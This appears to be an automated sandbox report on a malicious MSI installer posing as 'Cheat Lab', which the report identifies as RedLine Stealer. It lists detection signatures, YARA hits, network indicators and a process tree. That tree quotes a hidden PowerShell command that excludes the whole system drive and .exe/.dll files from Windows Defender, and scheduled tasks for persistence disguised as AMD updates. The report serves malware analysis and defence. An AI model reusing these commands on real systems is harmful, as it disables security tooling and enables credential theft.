Windows Analysis Report
Cheat.Lab.2.7.1.msi

Overview

General Information

Sample Name: Cheat.Lab.2.7.1.msi
Analysis ID: 1337007
MD5: c4acca57ad39174ba629781057f491e6
SHA1: 2b2e7ae4386d7c7527636de18a728719c298e38b
SHA256: a62db9a4b61d64f93c9352820da477026ab7ba3f0cabe119c201ae0ecbac82c7
Tags: msi, RedlineStealer
Infos:

Detection

RedLine
Score: 44
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Query firmware table information (likely to detect VMs)
Suspicious powershell command line found
Drops large PE files
Adds a directory exclusion to Windows Defender
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
May check the online IP address of the machine
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Contains functionality to launch a program with higher privileges
Checks for available system drives (often done to infect USB drives)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • msiexec.exe (PID: 2364 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.1.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 3812 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 4028 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 14B5C758307391A0BF1CDD495750E97E C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • LuaJIT.exe (PID: 7400 cmdline: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua MD5: 1BC7714501F86D5988816461F3637269)
        • schtasks.exe (PID: 7676 cmdline: schtasks /create /sc daily /st 12:47 /f /tn AMDCheckUpdates_NzEx /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua"" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7684 cmdline: schtasks /create /sc daily /st 12:47 /f /tn "LuaJIT" /tr ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua"" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • connect.exe (PID: 8016 cmdline: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe MD5: A8A24AF1D9E83BE788BD28D64967FE32)
          • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WerFault.exe (PID: 1576 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8016 -s 840 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • msiexec.exe (PID: 4592 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 89A97588E5A998E3A3D91B47458C8C78 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 1264 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 19958F299480DC364B0F0BF5C3172345 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSI7D5A.tmp (PID: 6768 cmdline: C:\Windows\Installer\MSI7D5A.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat MD5: B9545ED17695A32FACE8C3408A6A3553)
      • cmd.exe (PID: 5524 cmdline: C:\Windows\System32\cmd.exe" /C ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7172 cmdline: powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • NzEx.exe (PID: 7768 cmdline: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua MD5: 1BC7714501F86D5988816461F3637269)
  • LuaJIT.exe (PID: 7856 cmdline: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua MD5: 1BC7714501F86D5988816461F3637269)
  • LuaJIT.exe (PID: 7932 cmdline: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua MD5: 1BC7714501F86D5988816461F3637269)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
No configs have been found
Source | Rule | Description | Author | Strings
00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000015.00000002.2617633919.00000000020B2000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
21.2.connect.exe.20b0000.1.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
21.2.connect.exe.20b0000.1.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x3f8ca:$v2_1: ListOfProcesses
  • 0x3f40e:$v4_3: base64str
  • 0x415d0:$v4_4: stringKey
  • 0x3b177:$v4_5: BytesToStringConverted
  • 0x3a520:$v4_6: FromBase64
  • 0x3bddf:$v4_8: procName
  • 0x3acff:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
21.2.connect.exe.400000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
21.2.connect.exe.400000.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1fc94:$s5: delete[]
  • 0x1eb48:$s6: constructor or from DllMain.
  • 0x618da:$v2_1: ListOfProcesses
  • 0x6141e:$v4_3: base64str
  • 0x635e0:$v4_4: stringKey
  • 0x5d187:$v4_5: BytesToStringConverted
  • 0x5c530:$v4_6: FromBase64
  • 0x5ddef:$v4_8: procName
  • 0x5cd0f:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT

No Sigma rule has matched
No Snort rule has matched

          AV Detection

          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Avira: detection malicious, Label: TR/Crypt.OPACK.Gen
          Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49716 version: TLS 1.2
          Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\CheatLab Corp
          Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1
          Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
          Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
          Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI7D5A.tmp, 00000006.00000000.2063346881.0000000000A87000.00000002.00000001.01000000.00000003.sdmp, MSI7D5A.tmp, 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI7C0E.tmp.1.dr, MSI7D5A.tmp.1.dr
          Source: Binary string: mscorlib.pdb source: WER4B71.tmp.dmp.25.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdbb source: Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI5E96.tmp.0.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI5E96.tmp.0.dr
          Source: Binary string: mscorlib.ni.pdb source: WER4B71.tmp.dmp.25.dr
          Source: Binary string: mscorlib.ni.pdbRSDS source: WER4B71.tmp.dmp.25.dr
          Source: Binary string: mscorlib.pdb0 source: WER4B71.tmp.dmp.25.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI7D5A.tmp, 00000006.00000000.2063346881.0000000000A87000.00000002.00000001.01000000.00000003.sdmp, MSI7D5A.tmp, 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI7C0E.tmp.1.dr, MSI7D5A.tmp.1.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\aischeduler2.pdb source: Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI7CBC.tmp.1.dr
          Source: C:\Windows\System32\msiexec.exe File opened: z:
          Source: C:\Windows\System32\msiexec.exe File opened: x:
          Source: C:\Windows\System32\msiexec.exe File opened: v:
          Source: C:\Windows\System32\msiexec.exe File opened: t:
          Source: C:\Windows\System32\msiexec.exe File opened: r:
          Source: C:\Windows\System32\msiexec.exe File opened: p:
          Source: C:\Windows\System32\msiexec.exe File opened: n:
          Source: C:\Windows\System32\msiexec.exe File opened: l:
          Source: C:\Windows\System32\msiexec.exe File opened: j:
          Source: C:\Windows\System32\msiexec.exe File opened: h:
          Source: C:\Windows\System32\msiexec.exe File opened: f:
          Source: C:\Windows\System32\msiexec.exe File opened: b:
          Source: C:\Windows\System32\msiexec.exe File opened: y:
          Source: C:\Windows\System32\msiexec.exe File opened: w:
          Source: C:\Windows\System32\msiexec.exe File opened: u:
          Source: C:\Windows\System32\msiexec.exe File opened: s:
          Source: C:\Windows\System32\msiexec.exe File opened: q:
          Source: C:\Windows\System32\msiexec.exe File opened: o:
          Source: C:\Windows\System32\msiexec.exe File opened: m:
          Source: C:\Windows\System32\msiexec.exe File opened: k:
          Source: C:\Windows\System32\msiexec.exe File opened: i:
          Source: C:\Windows\System32\msiexec.exe File opened: g:
          Source: C:\Windows\System32\msiexec.exe File opened: e:
          Source: C:\Windows\SysWOW64\WerFault.exe File opened: c:
          Source: C:\Windows\System32\msiexec.exe File opened: a:
          Source: C:\Windows\Installer\MSI7D5A.tmp Code function: 6_2_00A7AF79 FindFirstFileExW,6_2_00A7AF79
          Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Joe Sandbox View IP Address: 208.95.112.1
          Source: Joe Sandbox View IP Address: 162.159.130.233
          Source: unknown DNS query: name: ip-api.com
          Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknown TCP traffic detected without corresponding DNS query: 193.37.71.112
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: connect.exe.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: connect.exe.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: connect.exe.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: connect.exe.11.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
          Source: connect.exe.11.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: connect.exe.11.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
          Source: connect.exe.11.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
          Source: connect.exe.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: connect.exe.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: connect.exe.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: connect.exe.11.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
          Source: connect.exe.11.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
          Source: connect.exe.11.drString found in binary or memory: http://ocsp.comodoca.com0
          Source: connect.exe.11.drString found in binary or memory: http://ocsp.digicert.com0A
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, connect.exe.11.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0O
          Source: connect.exe.11.drString found in binary or memory: http://ocsp.digicert.com0X
          Source: connect.exe.11.drString found in binary or memory: http://ocsp.sectigo.com0
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://t2.symcb.com0
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://tl.symcb.com/tl.crl0
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://tl.symcb.com/tl.crt0
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://tl.symcd.com0&
          Source: Amcache.hve.25.drString found in binary or memory: http://upx.sf.net
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: NzEx.exe.11.drString found in binary or memory: https://luajit.org/
          Source: connect.exe.11.drString found in binary or memory: https://sectigo.com/CPS0
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: https://www.advancedinstaller.com
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: https://www.thawte.com/cps0/
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: https://www.thawte.com/repository0W
          Source: unknownDNS traffic detected: queries for: ip-api.com
          Source: global traffic HTTP traffic detected:
